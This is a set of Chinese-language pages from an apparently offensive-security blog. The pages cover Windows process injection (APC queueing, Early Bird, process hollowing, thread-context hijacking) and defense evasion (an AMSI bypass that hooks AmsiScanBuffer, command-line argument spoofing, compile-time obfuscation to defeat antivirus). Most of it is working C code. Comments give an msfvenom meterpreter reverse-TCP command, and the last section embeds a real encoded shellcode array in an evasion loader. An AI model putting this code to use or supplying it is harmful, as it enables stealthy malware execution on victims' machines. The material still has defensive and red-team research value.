63 | 
64 | char shellcode[] = 
65 | "";
66 | 
67 | int main() {
68 | 
69 | 	HANDLE hThread = NULL;
70 | 	HANDLE hProcess = 0;
71 | 	DWORD ProcessId = 0;
72 | 	LPVOID AllocAddr = NULL;
73 | 
74 | 
75 | 	//hProcess = GetCurrentProcess();
76 | 	hProcess = OpenProcess(PROCESS_ALL_ACCESS, NULL, 12524);//notepad.exe
77 | 	AllocAddr = VirtualAllocEx(hProcess, 0, sizeof(shellcode) + 1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
78 | 	WriteProcessMemory(hProcess, AllocAddr, shellcode, sizeof(shellcode) + 1, 0);
79 | 
80 | 
81 | 	hThread = CreateRemoteThread(hProcess,0, 0, (LPTHREAD_START_ROUTINE)0xfff, 0, CREATE_SUSPENDED, NULL);
82 | 
83 | 	QueueUserAPC((PAPCFUNC)AllocAddr, hThread, 0);
84 | 	ResumeThread(hThread);
85 | 	//WaitForSingleObject(hThread,INFINITE);
86 | 	CloseHandle(hProcess);
87 | 	CloseHandle(hThread);
88 | 	return 0;
89 | 
90 | }
91 | ```
92 | 
93 | ![](../.gitbook/assets/image%20%2826%29.png)
94 | 
95 | 
96 | 
97 | 


--------------------------------------------------------------------------------
/code-and-dll-process-injection/early-bird.md:
--------------------------------------------------------------------------------
  1 | # Early Bird
  2 | 
  3 | ## Early Bird简介
  4 | 
  5 | Early Bird是一种简单而强大的技术，Early Bird本质上是一种APC注入与线程劫持的变体，由于线程初始化时会调用ntdll未导出函数NtTestAlert，该函数会清空并处理APC队列，所以注入的代码通常在进程的主线程的入口点之前运行并接管进程控制权，从而避免了反恶意软件产品的钩子的检测，同时获得一个合法进程的环境信息。
  6 | 
  7 | 线程初始化时调用NtTestAlert:
  8 | 
  9 | ![](../.gitbook/assets/image%20%2897%29.png)
 10 | 
 11 | ![](../.gitbook/assets/image%20%2896%29.png)
 12 | 
 13 | ![](../.gitbook/assets/image%20%2898%29.png)
 14 | 
 15 | 执行参考:
 16 | 
 17 | {% page-ref page="apc-and-nttestalert-code-execute.md" %}
 18 | 
 19 | ## Early Bird流程
 20 | 
 21 | 1. 创建一个挂起的进程\(通常是windows的合法进程\)
 22 | 2. 在挂起的进程内申请一块可读可写可执行的内存空间
 23 | 3. 往申请的空间内写入shellcode
 24 | 4. 将APC插入到该进程的主线程
 25 | 5. 恢复挂起进程的线程
 26 | 
 27 | ![](../.gitbook/assets/image%20%2813%29.png)
 28 | 
 29 | ## 代码实现
 30 | 
 31 | ```text
 32 | #include <stdio.h>
 33 | #include <windows.h>
 34 | //msfvenom -p windows/x64/meterpreter/reverse_tcp -e x64/xor_dynamic -i 14 LHOST=192.168.0.106 EXITFUNC=thread -f
 35 | unsigned char shellcode[] = "";
 36 | int main() {
 37 |     STARTUPINFO si = {0};
 38 |     PROCESS_INFORMATION pi = {0};
 39 |     si.cb = sizeof(STARTUPINFO);
 40 | 
 41 |     CreateProcessA("C:\\Program Files\\internet explorer\\iexplore.exe", NULL, NULL, NULL, TRUE, CREATE_SUSPENDED | CREATE_NO_WINDOW, NULL, NULL, (LPSTARTUPINFOA)&si, &pi);
 42 |     LPVOID lpBaseAddress = (LPVOID)VirtualAllocEx(pi.hProcess, NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
 43 |     WriteProcessMemory(pi.hProcess, lpBaseAddress, (LPVOID)shellcode, sizeof(shellcode), NULL);
 44 |     QueueUserAPC((PAPCFUNC)lpBaseAddress, pi.hThread, NULL);
 45 |     ResumeThread(pi.hThread);
 46 |     CloseHandle(pi.hThread);
 47 | 
 48 |     return 0;
 49 | }
 50 | ```
 51 | 
 52 | ## 配合FakePPID和FakeCurrentDirectory使用
 53 | 
 54 | ```text
 55 | #include <stdio.h>
 56 | #include <windows.h>
 57 | #include <TlHelp32.h>
 58 | 
 59 | 
 60 | DWORD FindExplorerPID() {
 61 |     HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
 62 |     PROCESSENTRY32 process = { 0 };
 63 |     process.dwSize = sizeof(process);
 64 | 
 65 |     if (Process32First(snapshot, &process)) {
 66 |         do {
 67 |             if (!wcscmp(process.szExeFile, L"explorer.exe"))
 68 |                 break;
 69 |         } while (Process32Next(snapshot, &process));
 70 |     }
 71 | 
 72 |     CloseHandle(snapshot);
 73 |     return process.th32ProcessID;
 74 | }
 75 | 
 76 | int main() {
 77 | 
 78 |     //msfvenom -p windows/x64/meterpreter/reverse_tcp -e x64/xor_dynamic -i 14 LHOST=192.168.0.106 EXITFUNC=thread -f
 79 |     unsigned char shellcode[] = ("");
 80 | 
 81 | 
 82 |     STARTUPINFOEXA siex;
 83 |     PROCESS_INFORMATION piex;
 84 |     SIZE_T sizeT;
 85 |     siex.StartupInfo.cb = sizeof(STARTUPINFOEXA);
 86 | 
 87 |     SetCurrentDirectoryA("C:\\Program Files\\internet explorer\\");
 88 | 
 89 |     HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, false, FindExplorerPID());
 90 | 
 91 |     InitializeProcThreadAttributeList(NULL, 1, 0, &sizeT);
 92 |     siex.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, sizeT);
 93 |     InitializeProcThreadAttributeList(siex.lpAttributeList, 1, 0, &sizeT);
 94 |     UpdateProcThreadAttribute(siex.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &hProcess, sizeof(HANDLE), NULL, NULL);
 95 |     
 96 |     
 97 |     CreateProcessA("C:\\Program Files\\internet explorer\\iexplore.exe", NULL, NULL, NULL, TRUE, CREATE_SUSPENDED | CREATE_NO_WINDOW | EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, (LPSTARTUPINFOA)&siex, &piex);
 98 |     LPVOID lpBaseAddress = (LPVOID)VirtualAllocEx(piex.hProcess, NULL, 0x1000, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
 99 |     WriteProcessMemory(piex.hProcess, lpBaseAddress, (LPVOID)shellcode, sizeof(shellcode), NULL);
100 |     QueueUserAPC((PAPCFUNC)lpBaseAddress, piex.hThread, NULL);
101 |     ResumeThread(piex.hThread);
102 |     CloseHandle(piex.hThread);
103 | 
104 |     return 0;
105 | }
106 | ```
107 | 
108 | ![](../.gitbook/assets/image%20%2837%29.png)
109 | 
110 | ![](../.gitbook/assets/image%20%288%29.png)
111 | 
112 | ## LINKS
113 | 
114 | {% embed url="https://www.securitynewspaper.com/2018/04/17/new-early-bird-code-injection-technique/" %}
115 | 
116 | {% embed url="https://blog.csdn.net/weixin\_42052102/article/details/83348780" %}
117 | 
118 | 
119 | 
120 | 
121 | 
122 | 


--------------------------------------------------------------------------------
/code-and-dll-process-injection/process-hollowing.md:
--------------------------------------------------------------------------------
  1 | ---
  2 | description: 进程镂空
  3 | ---
  4 | 
  5 | # Process Hollowing
  6 | 
  7 | ## Process Hollowing简介
  8 | 
  9 | 进程镂空是一种防御规避的进程注入技术,主要思想是卸载合法进程的内存，写入恶意软件的代码，伪装成合法进程进行恶意活动。
 10 | 
 11 | ![](../.gitbook/assets/process-hollowing.gif)
 12 | 
 13 | ## 执行流程
 14 | 
 15 | 1. 创建一个挂起的合法进程
 16 | 2. 读取恶意软件的代码
 17 | 3. 获取挂起进程上下文与环境信息
 18 | 4. 卸载挂起进程内存
 19 | 5. 写入恶意软件代码
 20 | 6. 恢复挂起进程
 21 | 
 22 | ## 代码实现
 23 | 
 24 | ### 1.创建一个挂起的合法进程
 25 | 
 26 | ```text
 27 | 	BOOL bRet = CreateProcessA(
 28 | 		NULL,
 29 | 		(LPSTR)"cmd",
 30 | 		NULL,
 31 | 		NULL,
 32 | 		FALSE,
 33 | 		CREATE_SUSPENDED,
 34 | 		NULL,
 35 | 		NULL,
 36 | 		&si,
 37 | 		&pi);
 38 | ```
 39 | 
 40 | ### 2.读取恶意软件的代码
 41 | 
 42 | ```text
 43 | 	hFile = CreateFileA(path, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
 44 | 	dwFileSize = GetFileSize(hFile, NULL); //获取替换可执行文件的大小
 45 | 	FileImage = VirtualAlloc(NULL, dwFileSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 
 46 | 	ReadFile(hFile, FileImage, dwFileSize, &FileReadSize, NULL);
 47 | 	CloseHandle(hFile);
 48 | ```
 49 | 
 50 | ### 3.获取挂起进程上下文与环境信息
 51 | 
 52 |  **进程环境块**（**PEB**）是 Windows NT操作系统内部使用的数据结构，用以存储每个进程的运行时数据，每个进程又有一个独立且由操作系统进行维护的PEB。
 53 | 
 54 | 挂起创建的进程的EBX&RDX寄存器存储着PEB,而PEB内存储着进程的实际加载地址。
 55 | 
 56 | ```text
 57 | 
 58 | 	GetThreadContext(pi.hThread, &ctx); //获取挂起进程上下文
 59 | 
 60 | #ifdef _WIN64
 61 | 	ReadVirtualMemory(pi.hProcess, (PVOID)(ctx.Rdx + (sizeof(SIZE_T) * 2)), &RemoteImageBase, sizeof(PVOID), NULL);
 62 | 	// 从rbx寄存器中获取PEB地址，并从PEB中读取可执行映像的基址
 63 | #endif
 64 | 	// 从ebx寄存器中获取PEB地址，并从PEB中读取可执行映像的基址
 65 | #ifdef _X86_
 66 | 	ReadProcessMemory(pi.hProcess, (PVOID)(ctx.Ebx + 8), &RemoteImageBase, sizeof(PVOID), NULL); 
 67 | #endif
 68 | ```
 69 | 
 70 | ### 4.卸载挂起进程内存
 71 | 
 72 | 如果恶意软件预期加载地址被占用，就使用ntdll内的NtUnmapViewOfSection函数卸载软件内存,该函数也是freelibrary等函数真正卸载内存使用的函数。
 73 | 
 74 | ```text
 75 | 	//判断文件预期加载地址是否被占用
 76 | 	pNtUnmapViewOfSection NtUnmapViewOfSection = (pNtUnmapViewOfSection)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection");
 77 | 	if ((SIZE_T)RemoteImageBase == pNtHeaders->OptionalHeader.ImageBase) 
 78 | 	{
 79 | 		NtUnmapViewOfSection(pi.hProcess, RemoteImageBase); //卸载已存在文件
 80 | 	}
 81 | ```
 82 | 
 83 | ### 5.写入恶意软件代码
 84 | 
 85 | 将恶意软件写入合法进程的空间,先写入文件头后逐段写入。
 86 | 
 87 | ```text
 88 | 
 89 | 	//为可执行映像分配内存,并写入文件头
 90 | 	RemoteProcessMemory = VirtualAllocEx(pi.hProcess, (PVOID)pNtHeaders->OptionalHeader.ImageBase, pNtHeaders->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); 
 91 | 	WriteProcessMemory(pi.hProcess, RemoteProcessMemory, FileImage, pNtHeaders->OptionalHeader.SizeOfHeaders, NULL); 
 92 | 
 93 | 	//逐段写入
 94 | 	for (int i = 0; i < pNtHeaders->FileHeader.NumberOfSections; i++)
 95 | 	{
 96 | 		pSectionHeaders = (PIMAGE_SECTION_HEADER)((LPBYTE)FileImage + pDosHeaders->e_lfanew + sizeof(IMAGE_NT_HEADERS) + (i * sizeof(IMAGE_SECTION_HEADER)));
 97 | 		WriteProcessMemory(pi.hProcess, (PVOID)((LPBYTE)RemoteProcessMemory + pSectionHeaders->VirtualAddress), (PVOID)((LPBYTE)FileImage + pSectionHeaders->PointerToRawData), pSectionHeaders->SizeOfRawData, NULL); 
 98 | 	}
 99 | 
100 | ```
101 | 
102 | ### 6.恢复挂起进程
103 | 
104 | 挂起创建的进程rcx&eax内存储着软件的入口点,需要将PEB内的实际加载地址修改为恶意软件预期的加载地址。
105 | 
106 | ```text
107 | //将rcx寄存器设置为注入软件的入口点,并将预期加载地址修改为实际加载地址
108 | #ifdef _WIN64
109 | 	ctx.Rcx = (SIZE_T)((LPBYTE)RemoteProcessMemory + pNtHeaders->OptionalHeader.AddressOfEntryPoint); 
110 | 	WriteProcessMemory(pi.hProcess, (PVOID)(ctx.Rdx + (sizeof(SIZE_T) * 2)), &pNtHeaders->OptionalHeader.ImageBase, sizeof(PVOID), NULL); 
111 | #endif
112 | 
113 | 	//将eax寄存器设置为注入软件的入口点,并将预期加载地址修改为实际加载地址
114 | #ifdef _X86_
115 | 	ctx.Eax = (SIZE_T)((LPBYTE)RemoteProcessMemory + pNtHeaders->OptionalHeader.AddressOfEntryPoint); // Set the eax register to the entry point of the injected FileImage
116 | 
117 | 	WriteProcessMemory(pi.hProcess, (PVOID)(ctx.Ebx + (sizeof(SIZE_T) * 2)), &pNtHeaders->OptionalHeader.ImageBase, sizeof(PVOID), NULL); 
118 | #endif
119 | 
120 | 
121 | 	SetThreadContext(pi.hThread, &ctx); // 设置线程上下文
122 | 	ResumeThread(pi.hThread); // 恢复挂起线程
123 | 
124 | ```
125 | 
126 | #### \* 实现效果
127 | 
128 | ![](../.gitbook/assets/image%20%2855%29.png)
129 | 
130 | ## 完整代码
131 | 
132 | * github:[https://github.com/idiotc4t/ProcessHollow.git](https://github.com/idiotc4t/ProcessHollow.git)
133 | 
134 | ## LINKS
135 | 
136 | {% embed url="https://www.elastic.co/cn/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" %}
137 | 
138 | {% embed url="https://attack.mitre.org/techniques/T1093/" %}
139 | 
140 | 
141 | 
142 | 


--------------------------------------------------------------------------------
/code-and-dll-process-injection/setcontext-hijack-thread.md:
--------------------------------------------------------------------------------
 1 | # SetContext Hijack Thread
 2 | 
 3 | ## 简介
 4 | 
 5 | 通常对于代码注入我们有很多种方式，现在这种方式原理与大部分注入方式技术原理相差不大，通常都是想尽办法让进程去执行我们自定义的代码，比如我们最经典的创建一个远程线程，入口点指定我们写入的代码，或者在程序执行流程上插桩，让正常进程去帮我们执行代码，这次介绍的方式比较暴力，直接劫持cpu的rip或eip指针，使其直接指向我们的恶意代码。
 6 | 
 7 | ## 注入流程
 8 | 
 9 | 1. 打开或创建一个进程。
10 | 2. 挂起其中一个线程。
11 | 3. 分配并写入shellcode。
12 | 4. 更改rip指针指向shellcode。
13 | 5. 恢复挂起线程。
14 | 
15 | ## 实现代码
16 | 
17 | ```text
18 | #include<Windows.h>
19 | #include<stdio.h>
20 | 
21 | char shellcode[] = "";
22 | ;
23 | int main(){
24 | 	STARTUPINFOA si = { 0 };
25 | 	si.cb = sizeof(si);
26 | 
27 | 	PROCESS_INFORMATION pi = {0};
28 | 
29 | 	CreateProcessA(NULL, (LPSTR)"notepad", NULL, NULL, FALSE, NULL, NULL, NULL, &si, &pi);
30 | 	SuspendThread(pi.hThread);
31 | 	LPVOID lpBuffer = VirtualAllocEx(pi.hProcess, NULL, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
32 | 	WriteProcessMemory(pi.hProcess, lpBuffer, shellcode, sizeof(shellcode), NULL);
33 | 	CONTEXT ctx = { 0 };
34 | 	ctx.ContextFlags = CONTEXT_ALL;
35 | 	GetThreadContext(pi.hThread, &ctx);
36 | 	ctx.Rip = (DWORD64)lpBuffer;
37 | 	SetThreadContext(pi.hThread, &ctx);
38 | 	ResumeThread(pi.hThread);
39 | 	return 0;
40 | }
41 | ```
42 | 
43 | ![](../.gitbook/assets/image%20%28108%29.png)
44 | 
45 | ## LINKS
46 | 
47 | {% embed url="https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-setthreadcontext" %}
48 | 
49 | 
50 | 
51 | 


--------------------------------------------------------------------------------
/defense-evasion/.net-fan-she-jia-zai.md:
--------------------------------------------------------------------------------
1 | # .NET反射加载
2 | 
3 | ## 
4 | 
5 | 


--------------------------------------------------------------------------------
/defense-evasion/apihook-and-dllinjection-bypass-amsi.md:
--------------------------------------------------------------------------------
 1 | # 基于API Hook和DLL注入的AMSI绕过
 2 | 
 3 | ## 简介
 4 | 
 5 | 前面我们有详细的介绍过AMSI的原理和基于内存补丁的绕过方法，这次我们介绍一种略微复杂的方法，同时这种方法也可以应用于各种场景，前面我们有介绍过通过微软开源库[Detours](../persistence/detous-inline-hook.md)的inLineHook和[进程注入](../code-and-dll-process-injection/createremotethread.md)的dll注入，这次我们把这两种技术做一个组合，来实现amsi的绕过，同样的思路也可以对 EtwEventWrite进行修补，使其丧失记录日志能力。
 6 | 
 7 | ## 流程
 8 | 
 9 | 1. 编写一个hook AmsiScanBuffer的dll
10 | 2. 使用[dll注入](../code-and-dll-process-injection/createremotethread.md#42-dll-zhu-ru)进powershell进程
11 | 3. 完成绕过
12 | 
13 | ## 代码
14 | 
15 | dll注入的代码延用[CreateRemoteThrea](../code-and-dll-process-injection/createremotethread.md)的代码。
16 | 
17 | ```text
18 | #include <Windows.h>
19 | #include <stdio.h>
20 | #include <amsi.h>
21 | #include "include/detours.h"
22 | #pragma comment(lib, "amsi.lib")
23 | #pragma comment(lib,"lib.X64/detours.lib")
24 | 
25 | #define SafeString "SafeString"
26 | 
27 | static HRESULT(WINAPI* _AmsiScanBuffer)(
28 |     HAMSICONTEXT amsiContext,
29 |     PVOID        buffer,
30 |     ULONG        length,
31 |     LPCWSTR      contentName,
32 |     HAMSISESSION amsiSession,
33 |     AMSI_RESULT* result
34 |     ) = AmsiScanBuffer;
35 | 
36 | HRESULT WINAPI AmsiScanBuffer_(
37 |     HAMSICONTEXT amsiContext,
38 |     PVOID        buffer,
39 |     ULONG        length,
40 |     LPCWSTR      contentName,
41 |     HAMSISESSION amsiSession,
42 |     AMSI_RESULT* result
43 | ) 
44 | {
45 |     return _AmsiScanBuffer(amsiContext, (BYTE*)SafeString, length, contentName, amsiSession, result);
46 | }
47 | 
48 | 
49 | BOOL APIENTRY DllMain(HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
50 | {
51 |     if (DetourIsHelperProcess()) {
52 |         return TRUE;
53 |     }
54 |     switch (ul_reason_for_call)
55 |     {
56 |     case DLL_PROCESS_ATTACH:
57 |         DetourTransactionBegin();
58 |         DetourUpdateThread(GetCurrentThread());
59 |         DetourAttach(&(PVOID&)_AmsiScanBuffer, AmsiScanBuffer_);
60 |         DetourTransactionCommit();
61 |         printf("hook ok\n");
62 |         break;
63 |     case DLL_THREAD_ATTACH:
64 |         break;
65 |     case DLL_THREAD_DETACH:
66 |         break;
67 |     case DLL_PROCESS_DETACH:
68 |         DetourTransactionBegin();
69 |         DetourUpdateThread(GetCurrentThread());
70 |         DetourDetach(&(PVOID&)_AmsiScanBuffer, AmsiScanBuffer_);
71 |         DetourTransactionCommit();
72 |         break;
73 |     }
74 |     return TRUE;
75 | 
76 | }
77 | ```
78 | 
79 | ![](../.gitbook/assets/image%20%28114%29.png)
80 | 
81 | ## LINKS
82 | 
83 | {% embed url="https://x64sec.sh/understanding-and-bypassing-amsi/" %}
84 | 
85 | 
86 | 
87 | 


--------------------------------------------------------------------------------
/defense-evasion/cobaltstrike-argue.md:
--------------------------------------------------------------------------------
  1 | # CobaltStrike Argue命令实现
  2 | 
  3 | ## 简介
  4 | 
  5 | 在Cobalt Strike 3.13版本的时候引入了一个进程参数欺骗的技术\(虽然现在都4.0了\)，可以使进程在创建时记录的参数与实际运行时不同，windows系统从peb的commandline中读取参数，并对参数做相应的处理，在线程未初始化完成前，我们可以修改参数，并让进程执行它，在操作上几乎与命令行伪装一样，只是有一些流程上的不同，这里不过多赘述详见[伪装命令行规避检测](fake-commandline.md)。
  6 | 
  7 | ## 利用流程
  8 | 
  9 | 1. 创建一个挂起的cmd或powershell进程。
 10 | 2. 读取peb内的RTL\_USER\_PROCESS\_PARAMETERS结构体。
 11 | 3. 定位到commandline的buffer指针。
 12 | 4. 修改buffer的存放的commandline。
 13 | 
 14 | ## 代码实现
 15 | 
 16 | ```text
 17 | #include <stdio.h>
 18 | #include <Windows.h>
 19 | #include <winternl.h>
 20 | 
 21 | 
 22 | typedef DWORD(*pNtQueryInformationProcess) (HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG);
 23 | 
 24 | int main()
 25 | {
 26 | 
 27 | 	ULONG lenght = 0;
 28 | 	HMODULE hModule;
 29 | 	PROCESS_BASIC_INFORMATION ProcessInformation;
 30 | 	pNtQueryInformationProcess NtQueryInformationProcess;
 31 | 	wchar_t CommandLine[] = L"C:\\Windows\\system32\\cmd.exe /c dir";
 32 | 	//.&& whoami / priv && pause"
 33 | 	wchar_t CurrentDirectory[] = L"C:\\Windows\\system32\\";
 34 | 
 35 | 	hModule = LoadLibraryA("ntdll.dll");
 36 | 
 37 | 	STARTUPINFOA si = { 0 };
 38 | 	si.cb = sizeof(si);
 39 | 	PROCESS_INFORMATION pi = { 0 };
 40 | 
 41 | 	CreateProcessA(NULL, (LPSTR)"C:\\Windows\\system32\\cmd.exe /c whoami", NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
 42 | 
 43 | 	NtQueryInformationProcess = (pNtQueryInformationProcess)GetProcAddress(hModule, "NtQueryInformationProcess");
 44 | 	NtQueryInformationProcess(pi.hProcess, ProcessBasicInformation, &ProcessInformation, sizeof(ProcessInformation), &lenght);
 45 | 	
 46 | 	RTL_USER_PROCESS_PARAMETERS rupp = { 0 };
 47 | 	PEB peb = { 0 };
 48 | 
 49 | 	ReadProcessMemory(pi.hProcess, ProcessInformation.PebBaseAddress, &peb, sizeof(peb), NULL);
 50 | 	ReadProcessMemory(
 51 | 		pi.hProcess,
 52 | 		peb.ProcessParameters,
 53 | 		&rupp,
 54 | 		sizeof(RTL_USER_PROCESS_PARAMETERS)
 55 | 		, NULL);
 56 | 
 57 | 	WriteProcessMemory(pi.hProcess, (LPVOID)rupp.CommandLine.Buffer, CommandLine, sizeof(CommandLine), NULL);
 58 | 	ResumeThread(pi.hThread);
 59 | 
 60 | 	return 0;
 61 | }
 62 | ```
 63 | 
 64 | 执行了修改后的参数: 
 65 | 
 66 | ![](../.gitbook/assets/image%20%28112%29.png)
 67 | 
 68 | ## 扩展利用
 69 | 
 70 | 前面我们说了process hacker和process explorer等进程监视工具会从peb内直接读取commandline的内容，这时就有小朋友要问了，那我们这么做不是会被发现吗\(不皮了不皮了\)。
 71 | 
 72 | 实际上这么做确实会被此类工具发现明显异常，但由于操作系统读取数据和此类工具读取数据存在一定差异，我们可以利用这样的读取差异来隐藏我们真实的参数。
 73 | 
 74 | 由于进程监视工具\(啃过源码\)会先读取commandline的length，根据length的值来读取commandline.buffer的内容，而操作系统则由是通过'\x00'来判断字符串是否结束。
 75 | 
 76 | 这时我们可以写入一个比length更长的命令让监视工具的读取不完全，那么我们就可以在此类工具中伪装commandline。
 77 | 
 78 | ### 代码
 79 | 
 80 | ```text
 81 | #include <stdio.h>
 82 | #include <Windows.h>
 83 | #include <winternl.h>
 84 | 
 85 | 
 86 | typedef DWORD(*pNtQueryInformationProcess) (HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG);
 87 | 
 88 | int main()
 89 | {
 90 | 
 91 | 	ULONG lenght = 0;
 92 | 	HMODULE hModule;
 93 | 	PROCESS_BASIC_INFORMATION ProcessInformation;
 94 | 	pNtQueryInformationProcess NtQueryInformationProcess;
 95 | 	wchar_t CommandLine[] = L"C:\\Windows\\system32\\cmd.exe /c dir . && whoami /priv && pause";
 96 | 
 97 | 	wchar_t CurrentDirectory[] = L"C:\\Windows\\system32\\";
 98 | 
 99 | 	hModule = LoadLibraryA("ntdll.dll");
100 | 
101 | 	STARTUPINFOA si = { 0 };
102 | 	si.cb = sizeof(si);
103 | 	PROCESS_INFORMATION pi = { 0 };
104 | 
105 | 	CreateProcessA(NULL, (LPSTR)"C:\\Windows\\system32\\cmd.exe /c whoami", NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
106 | 
107 | 	NtQueryInformationProcess = (pNtQueryInformationProcess)GetProcAddress(hModule, "NtQueryInformationProcess");
108 | 	NtQueryInformationProcess(pi.hProcess, ProcessBasicInformation, &ProcessInformation, sizeof(ProcessInformation), &lenght);
109 | 	
110 | 	RTL_USER_PROCESS_PARAMETERS rupp = { 0 };
111 | 	PEB peb = { 0 };
112 | 
113 | 	ReadProcessMemory(pi.hProcess, ProcessInformation.PebBaseAddress, &peb, sizeof(peb), NULL);
114 | 	ReadProcessMemory(
115 | 		pi.hProcess,
116 | 		peb.ProcessParameters,
117 | 		&rupp,
118 | 		sizeof(RTL_USER_PROCESS_PARAMETERS)
119 | 		, NULL);
120 | 
121 | 	WriteProcessMemory(pi.hProcess, (LPVOID)rupp.CommandLine.Buffer, CommandLine, sizeof(CommandLine), NULL);
122 | 	ResumeThread(pi.hThread);
123 | 
124 | 	return 0;
125 | }
126 | ```
127 | 
128 | ### 实现效果
129 | 
130 | ![process explorer](../.gitbook/assets/image%20%28111%29.png)
131 | 
132 | ![process hacker](../.gitbook/assets/image%20%28109%29.png)
133 | 
134 | ![dir . &amp;&amp; whoami /priv &amp;&amp; pause](../.gitbook/assets/image%20%28110%29.png)
135 | 
136 | ## LINKS
137 | 
138 | {% embed url="https://app.gitbook.com/@idiotc4t/s/idiotc4t-s-blog/~/drafts/-M9J1qlIVoEe-n1mUrUo/defense-evasion/fake-commandline" %}
139 | 
140 | {% embed url="https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/" %}
141 | 
142 | 
143 | 
144 | 
145 | 
146 | 


--------------------------------------------------------------------------------
/defense-evasion/compile-time-obfuscation.md:
--------------------------------------------------------------------------------
  1 | # 编译时混淆字符串&函数调用
  2 | 
  3 | ## 简介
  4 | 
  5 | 在做免杀的时候发现了一个宝藏项目[ADVobfuscator](https://github.com/andrivet/ADVobfuscator)，这个项目能在编译时混淆函数调用和字符串，通常字符串会被杀毒软件作为比较典型的特征，如果我们能在编译时混淆这些东西，那么会对杀毒软件判断的静态特征产生很大程度的避免，同时混淆函数调用也能对行为查杀产生一定程度的影响。
  6 | 
  7 | mimikatz特征：
  8 | 
  9 | ![](../.gitbook/assets/image%20%28129%29.png)
 10 | 
 11 | ## 使用
 12 | 
 13 | 在配置完之后，我们可以直接查看混淆和无混淆编译出来后的结果。
 14 | 
 15 | 未混淆：
 16 | 
 17 | ```text
 18 | printf("hello world\n");
 19 | ```
 20 | 
 21 | ![](../.gitbook/assets/image%20%28133%29.png)
 22 | 
 23 | 混淆:
 24 | 
 25 | ```text
 26 |  printf(OBFUSCATED("hello world\n"));
 27 | ```
 28 | 
 29 | ![](../.gitbook/assets/image%20%28131%29.png)
 30 | 
 31 | 同样我们可以同类似的方法来测试函数混淆，使用被杀烂的加载器编写方式，然后去在线查毒对比效果。
 32 | 
 33 | ```text
 34 | 
 35 | #if !defined(DEBUG) || DEBUG == 0
 36 | #define BOOST_DISABLE_ASSERTS
 37 | #endif
 38 | 
 39 | #pragma warning(disable: 4503)
 40 | 
 41 | #define ADVLOG 1
 42 | 
 43 | #include "Log.h"
 44 | #include "MetaString.h"
 45 | #include "ObfuscatedCall.h"
 46 | #include "ObfuscatedCallWithPredicate.h"
 47 | #include <Windows.h>
 48 | #include <stdio.h>
 49 | 
 50 | #pragma comment(linker, "/section:.data,RWE")   
 51 | #pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")  
 52 | #pragma comment(linker, "/INCREMENTAL:NO") 
 53 | using namespace std;
 54 | using namespace andrivet::ADVobfuscator;
 55 | 
 56 | char shellcode[] = "\xeb\x23\x5b\x89\xdf\xb0\xb5\xfc\xae\x75\xfd\x89\xf9\x89\xde"
 57 | "\x8a\x06\x30\x07\x47\x66\x81\x3f\x2a\x1d\x74\x08\x46\x80\x3e"
 58 | "\xb5\x75\xee\xeb\xea\xff\xe1\xe8\xd8\xff\xff\xff\x11\xb5\xfa"
 59 | "\x32\x4a\x98\xce\xa1\xca\xed\xbf\x64\xec\x98\xe8\x98\xcf\x9b"
 60 | "\x17\x21\x16\x56\x77\x90\x2e\x0c\x41\x65\x19\x57\x91\x2f\xca"
 61 | "\x64\xff\xfa\xfb\xee\xf0\xf9\xc9\xee\xee\xee\x1e\xca\xc7\xf5"
 62 | "\x85\xc7\x6a\x3a\xea\x2f\xcc\xac\x69\x2f\xd7\x7a\x95\x6f\x2e"
 63 | "\x95\x68\x12\x95\x68\x02\x95\x58\x16\x95\x60\x3e\x95\x28\x26"
 64 | "\x51\x06\x6b\xed\x47\x1f\xcf\xe1\xff\x7e\x95\x72\x3a\x3a\x95"
 65 | "\x5b\x22\x95\x4a\x36\x66\x1f\xf4\x95\x54\x06\x95\x44\x3e\x1f"
 66 | "\xf5\xfd\x2a\x57\x95\x2a\x95\x1f\xf0\x2f\xe1\x2f\xde\xe2\xb2"
 67 | "\x9a\xde\x6a\x19\xdf\xd1\x13\x1f\xd9\xf5\xea\x25\x62\x3a\x36"
 68 | "\x6b\xff\x95\x44\x3a\x1f\xf5\x78\x95\x12\x55\x95\x44\x02\x1f"
 69 | "\xf5\x95\x1a\x95\x1f\xf6\x97\x5a\x3a\x02\x7f\xdd\xac\x16\x37"
 70 | "\xca\x97\xfb\x97\xdc\x76\x90\x50\x10\xf2\x4c\xf6\x81\xe1\xe1"
 71 | "\xe1\x97\x5b\x1a\xa5\x60\xc6\xfc\x6d\x99\x02\x3a\x4c\xf6\x90"
 72 | "\xe1\xe1\xe1\x97\x5b\x16\x76\x72\x72\x3e\x5f\x76\x2d\x2c\x30"
 73 | "\x7a\x76\x6b\x6d\x7b\x6c\x2e\xc5\x96\x42\x3a\x14\x97\xf8\x48"
 74 | "\xe1\x4b\x1a\x97\xdc\x4e\xa5\xb6\xbc\x53\xa2\x99\x02\x3a\x4c"
 75 | "\xf6\x41\xe1\xe1\xe1\x76\x71\x66\x46\x3e\x76\x7f\x79\x7b\x5c"
 76 | "\x76\x53\x7b\x6d\x6d\x2f\xc5\x96\x42\x3a\x14\x97\xfd\x76\x46"
